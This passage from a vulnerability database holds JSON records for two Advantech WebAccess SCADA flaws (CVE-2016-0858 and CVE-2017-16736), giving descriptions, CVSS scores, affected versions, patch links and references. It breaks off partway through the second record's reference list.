Race condition in Advantech WebAccess before 8.1 allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow) via a crafted request. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x7920 IOCTL in the Kernel subsystem. A shared virtual memory overflow vulnerability exists in a call to strcpy. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities: 1. A denial-of-service vulnerability 2. An arbitrary file-upload vulnerability 3. A directory-traversal vulnerability 4. Multiple stack-based buffer-overflow vulnerabilities 5. Multiple buffer-overflow vulnerabilities 7. Multiple information disclosure vulnerabilities 8. A cross-site scripting vulnerability 9. An SQL-injection vulnerability 10. A cross-site request forgery vulnerability 11. This may aid in further attacks. Advantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201601-0040", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "64d1d484-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-105" }, { "db": "CNVD", "id": "CNVD-2016-00436" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001288" }, { "db": "CNNVD", "id": "CNNVD-201601-331" }, { "db": "NVD", "id": "CVE-2016-0858" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-001288" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-105" } ], "trust": 0.7 }, "cve": "CVE-2016-0858", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2016-0858", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 2.5, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CNVD-2016-00436", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "64d1d484-2351-11e6-abef-000c29c66e3d", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "VHN-88368", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.2, "id": "CVE-2016-0858", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2016-0858", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2016-0858", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2016-0858", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2016-00436", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201601-331", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "64d1d484-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-88368", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "64d1d484-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-105" }, { "db": "CNVD", "id": "CNVD-2016-00436" }, { "db": "VULHUB", "id": "VHN-88368" }, { "db": "JVNDB", "id": "JVNDB-2016-001288" }, { "db": "CNNVD", "id": "CNNVD-201601-331" }, { "db": "NVD", "id": "CVE-2016-0858" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Race condition in Advantech WebAccess before 8.1 allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow) via a crafted request. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x7920 IOCTL in the Kernel subsystem. A shared virtual memory overflow vulnerability exists in a call to strcpy. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities:\n1. A denial-of-service vulnerability\n2. An arbitrary file-upload vulnerability\n3. A directory-traversal vulnerability\n4. Multiple stack-based buffer-overflow vulnerabilities\n5. Multiple buffer-overflow vulnerabilities\n7. Multiple information disclosure vulnerabilities\n8. A cross-site scripting vulnerability\n9. An SQL-injection vulnerability\n10. A cross-site request forgery vulnerability\n11. This may aid in further attacks. \nAdvantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech", "sources": [ { "db": "NVD", "id": "CVE-2016-0858" }, { "db": "JVNDB", "id": "JVNDB-2016-001288" }, { "db": "ZDI", "id": "ZDI-16-105" }, { "db": "CNVD", "id": "CNVD-2016-00436" }, { "db": "BID", "id": "80745" }, { "db": "IVD", "id": "64d1d484-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-88368" } ], "trust": 3.33 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-0858", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-16-014-01", "trust": 3.4 }, { "db": "ZDI", "id": "ZDI-16-105", "trust": 1.8 }, { "db": "CNNVD", "id": "CNNVD-201601-331", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2016-00436", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-001288", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3196", "trust": 0.7 }, { "db": "BID", "id": "80745", "trust": 0.3 }, { "db": "IVD", "id": "64D1D484-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-88368", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "64d1d484-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-105" }, { "db": "CNVD", "id": "CNVD-2016-00436" }, { "db": "VULHUB", "id": "VHN-88368" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001288" }, { "db": "CNNVD", "id": "CNNVD-201601-331" }, { "db": "NVD", "id": "CVE-2016-0858" } ] }, "id": "VAR-201601-0040", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "64d1d484-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00436" }, { "db": "VULHUB", "id": "VHN-88368" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "64d1d484-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00436" } ] }, "last_update_date": "2024-11-23T21:43:23.070000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "title": "Patch for Advantech WebAccess Competitive Condition Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/70380" }, { "title": "Advantech WebAccess Repair measures for competitive conditions", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59649" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-105" }, { "db": "CNVD", "id": "CNVD-2016-00436" }, { "db": "JVNDB", "id": "JVNDB-2016-001288" }, { "db": "CNNVD", "id": "CNNVD-201601-331" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 }, { "problemtype": "CWE-362", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-88368" }, { "db": "JVNDB", "id": "JVNDB-2016-001288" }, { "db": "NVD", "id": "CVE-2016-0858" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 4.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-014-01" }, { "trust": 1.4, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-0858" }, { "trust": 1.1, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-105" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0858" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-105" }, { "db": "CNVD", "id": "CNVD-2016-00436" }, { "db": "VULHUB", "id": "VHN-88368" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001288" }, { "db": "CNNVD", "id": "CNNVD-201601-331" }, { "db": "NVD", "id": "CVE-2016-0858" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "64d1d484-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-105" }, { "db": "CNVD", "id": "CNVD-2016-00436" }, { "db": "VULHUB", "id": "VHN-88368" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001288" }, { "db": "CNNVD", "id": "CNNVD-201601-331" }, { "db": "NVD", "id": "CVE-2016-0858" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "IVD", "id": "64d1d484-2351-11e6-abef-000c29c66e3d" }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-105" }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00436" }, { "date": "2016-01-15T00:00:00", "db": "VULHUB", "id": "VHN-88368" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001288" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-331" }, { "date": "2016-01-15T03:59:20.173000", "db": "NVD", "id": "CVE-2016-0858" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-105" }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00436" }, { "date": "2016-12-03T00:00:00", "db": "VULHUB", "id": "VHN-88368" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001288" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-331" }, { "date": "2024-11-21T02:42:31.277000", "db": "NVD", "id": "CVE-2016-0858" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-331" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerable to arbitrary code execution", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-001288" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "competitive condition", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-331" } ], "trust": 0.6 } }
var-201801-0155
Vulnerability from variot
An Unrestricted Upload Of File With Dangerous Type issue was discovered in Advantech WebAccess versions prior to 8.3. WebAccess allows a remote attacker to upload arbitrary files. Advantech WebAccess Contains a vulnerability related to unlimited uploads of dangerous types of files.Information may be tampered with. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201801-0155", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lt", "trust": 2.4, "vendor": "advantech", "version": "8.3" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2e32a82-39ab-11e9-b542-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-02540" }, { "db": "JVNDB", "id": "JVNDB-2018-001408" }, { "db": "CNNVD", "id": "CNNVD-201801-560" }, { "db": "NVD", "id": "CVE-2017-16736" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-001408" } ] }, "cve": "CVE-2017-16736", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2017-16736", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CNVD-2018-02540", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "e2e32a82-39ab-11e9-b542-000c29342cb1", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-107688", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CVE-2017-16736", "impactScore": 3.6, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-16736", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2017-16736", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2018-02540", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201801-560", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e2e32a82-39ab-11e9-b542-000c29342cb1", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-107688", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "e2e32a82-39ab-11e9-b542-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-02540" }, { "db": "VULHUB", "id": "VHN-107688" }, { "db": "JVNDB", "id": "JVNDB-2018-001408" }, { "db": "CNNVD", "id": "CNNVD-201801-560" }, { "db": "NVD", "id": "CVE-2017-16736" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "An Unrestricted Upload Of File With Dangerous Type issue was discovered in Advantech WebAccess versions prior to 8.3. WebAccess allows a remote attacker to upload arbitrary files. Advantech WebAccess Contains a vulnerability related to unlimited uploads of dangerous types of files.Information may be tampered with. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2017-16736" }, { "db": "JVNDB", "id": "JVNDB-2018-001408" }, { "db": "CNVD", "id": "CNVD-2018-02540" }, { "db": "IVD", "id": "e2e32a82-39ab-11e9-b542-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-107688" } ], "trust": 2.43 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-16736", "trust": 3.3 }, { "db": "ICS CERT", "id": "ICSA-18-004-02A", "trust": 3.1 }, { "db": "CNNVD", "id": "CNNVD-201801-560", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-02540", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-001408", "trust": 0.8 }, { "db": "IVD", "id": "E2E32A82-39AB-11E9-B542-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-107688", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2e32a82-39ab-11e9-b542-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-02540" }, { "db": "VULHUB", "id": "VHN-107688" }, { "db": "JVNDB", "id": "JVNDB-2018-001408" }, { "db": "CNNVD", "id": "CNNVD-201801-560" }, { "db": "NVD", "id": "CVE-2017-16736" } ] }, "id": "VAR-201801-0155", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "e2e32a82-39ab-11e9-b542-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-02540" }, { "db": "VULHUB", "id": "VHN-107688" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2e32a82-39ab-11e9-b542-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-02540" } ] }, "last_update_date": "2024-11-23T22:22:16.093000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Advantech WebAccess patch for arbitrary file upload vulnerabilities", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/115337" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=77762" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-02540" }, { "db": "JVNDB", "id": "JVNDB-2018-001408" }, { "db": "CNNVD", "id": "CNNVD-201801-560" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-434", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-107688" }, { "db": "JVNDB", "id": "JVNDB-2018-001408" }, { "db": "NVD", "id": "CVE-2017-16736" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-004-02a" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-16736" }, { "trust": 0.8, "url": 